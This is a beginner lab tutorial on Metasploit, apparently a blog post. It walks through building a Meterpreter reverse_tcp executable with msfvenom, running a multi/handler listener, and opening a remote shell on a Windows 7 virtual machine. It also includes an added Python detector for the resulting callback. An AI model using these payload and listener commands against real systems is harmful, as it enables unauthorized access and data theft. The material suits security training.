So what is Metasploit? It is basically a security testing framework used to audit a system and find the vulnerabilities that an attacker could exploit. The flip side is that attackers use the same tool to break into systems and steal private information such as important files and passwords.
In this post, we will be using Kali Linux, a Linux distribution made especially for security auditing, digital forensics and similar work. We have set up a virtual environment so that we can demonstrate how it works. If you are a total beginner with Linux, I suggest you learn the basic Linux commands here first. These will eventually be helpful if you want to learn more about hacking. We will be penetrating a Windows 7 virtual machine.
IMPORTANT NOTE: THE FOLLOWING TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT INTEND TO PROMOTE ANY KIND OF MALICIOUS PRACTICES. THE USERS THEMSELVES WILL BE RESPONSIBLE FOR HOW THEY USE IT. SO USE IT AT YOUR OWN RISK!
Let's begin!
=>Open VirtualBox and create a virtual machine for Kali Linux. Click here for a step-by-step guide on how to install Kali Linux in a virtual machine.
=>Then, install Windows 7 in a similar manner in a different virtual machine.
=>In the VirtualBox application, click on the Kali Linux machine and then click on Settings. In the Network section, change "Attached to:" from NAT to Bridged Adapter. Click OK. Do the same for the Windows machine.

=>Power on both the machines. Now, inside Kali Linux, open a Terminal and type
ifconfig
This will show you the IP address of the Kali virtual machine. In our case, it is 192.168.1.9.

=>Disable the firewall in the Windows machine. There are plenty of resources on the internet that will tell you how to do that.
=>The next step is to generate a payload. A payload is a piece of code that will run on the victim's machine and, in our case, will give us access to that machine. To generate a payload, type:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 -f exe > ~/Desktop/alert.exe
Let's see what it means:
msfvenom
This is a combination of two great tools, msfpayload (the part of the Metasploit framework that generates payloads) and msfencode (which encodes the payload into the desired format). This command generates the payload according to the given arguments/options.
-p windows/meterpreter/reverse_tcp
-p is used to specify the type of payload. Since we want to attack a Windows PC, we use windows/meterpreter/reverse_tcp. Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. reverse_tcp makes the victim machine connect back to the attacker (a reverse shell), who then gets access to it.
LHOST=192.168.1.9
The attacker's IP address, i.e. the address the payload will connect back to.
LPORT=4444
The port on the attacker's machine to which the Meterpreter session will connect back.
-f exe
The file format of the generated payload (a Windows executable).
~/Desktop/alert.exe
The path of the output file for the payload.
=>Now, you will see that a file named alert.exe has been created on the Desktop. Transfer this file to the victim machine. For this, you can use websites like expirebox.com, which provide a great way to temporarily share files over the internet (and it's easy & free too!)
=>Now, type
msfconsole
inside the terminal and hit Enter. It may take some time to load, so be patient!
=>Now type in the following commands:
use multi/handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
exploit
What do they mean:
use multi/handler
and
use exploit/multi/handler
Select the handler module that will listen for the incoming connection (both forms load the same module, so typing either one is enough)
set payload windows/meterpreter/reverse_tcp
Sets the payload the handler should expect (the same one msfvenom generated)
set LHOST 192.168.1.9
Listen on this IP address for incoming connections (same as the payload's LHOST)
set LPORT 4444
The port on which Meterpreter sessions will be opened (same as the payload's LPORT).
exploit
Start the handler and wait for the victim to connect back
Now, you will see something like this:

=>At this point, double-click on the alert.exe file inside the victim machine.
If all went well, you will see that a Meterpreter session has been opened. Congratulations!!! You just hacked your way into a Windows system!!! :)
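What the defender sees at the moment that session opens, as an added example that is not part of the original post: when alert.exe runs, the Windows VM makes an outbound TCP connection from an executable on the Desktop to LHOST:LPORT (192.168.1.9:4444). The Python below scans constructed, Sysmon-style connection records (the line format is an assumption, not real Sysmon output) for exactly that pattern: an outbound connection from a user-writable folder to an uncommon port.

```python
import re
# Folders an ordinary user can write to; a freshly downloaded payload lives here.
USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")
# Ports a normal client process is expected to talk to.
COMMON_PORTS = {53, 80, 443, 445, 3389}
# Constructed log format (an assumption, not real Sysmon output): one line per
# network connection, recording the process image and the destination.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) NetworkConnect image=(?P<image>.+?) "
    r"dst=(?P<ip>[\d.]+):(?P<port>\d+) initiated=(?P<init>true|false)$"
)

def parse_line(line):
    """Return the event fields as a dict, or None for a non-matching line."""
    m = LINE_RE.match(line.strip())
    return m and {"ts": m["ts"], "image": m["image"], "ip": m["ip"],
                  "port": int(m["port"]), "initiated": m["init"] == "true"}

def reasons_for(ev):
    """List why this event looks like a reverse_tcp callback; empty = benign."""
    reasons = []
    if not ev["initiated"]:
        return reasons            # inbound: not the outbound callback pattern
    if any(d in ev["image"].lower() for d in USER_WRITABLE):
        reasons.append("process runs from a user-writable folder")
    if ev["port"] not in COMMON_PORTS:
        reasons.append("outbound to uncommon port %d" % ev["port"])
    return reasons

def scan(lines):
    """Return (timestamp, image, 'ip:port', reasons) for each suspicious event."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if not ev:
            continue              # malformed or unrelated line: skip it
        r = reasons_for(ev)
        if r:
            findings.append((ev["ts"], ev["image"], "%s:%d" % (ev["ip"], ev["port"]), r))
    return findings

# Constructed sample telemetry: two normal connections, the alert.exe callback
# from the tutorial, an inbound connection, and a line the parser must skip.
SAMPLE_LOG = [
    "2024-01-01T10:00:01 NetworkConnect image=C:\\Program Files\\Mozilla Firefox\\firefox.exe dst=203.0.113.5:443 initiated=true",
    "2024-01-01T10:00:02 NetworkConnect image=C:\\Windows\\System32\\svchost.exe dst=192.168.1.1:53 initiated=true",
    "2024-01-01T10:00:03 NetworkConnect image=C:\\Users\\bob\\Desktop\\alert.exe dst=192.168.1.9:4444 initiated=true",
    "2024-01-01T10:00:04 NetworkConnect image=C:\\Windows\\System32\\svchost.exe dst=192.168.1.20:445 initiated=false",
    "garbage line the parser must skip",
]
```

Only the alert.exe line is reported, with both reasons attached; the browser and system-service connections and the inbound connection are left alone.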

=>Let's have some fun now. To open Paint inside the victim's machine, type this in the Meterpreter prompt:
execute -f mspaint

=>To get a Windows command prompt session on the remote machine, simply type
shell
From there, you can use Windows shell commands like dir, ipconfig etc.

=>Let's do one last trick. From the Windows command prompt opened in the previous step, type the following command to pop up a dialog box on the victim machine:
msg * "You have been hacked!!!"

There is a lot more you can do from a Meterpreter session, such as sending files to the victim machine or getting access to its passwords and other sensitive information.
Security Tip: Always keep your firewall on and your antivirus up to date. DO NOT open applications from untrusted sources. And finally, spread the word about security.
And that's it for now! Hope you like it! Comment below for suggestions and queries :D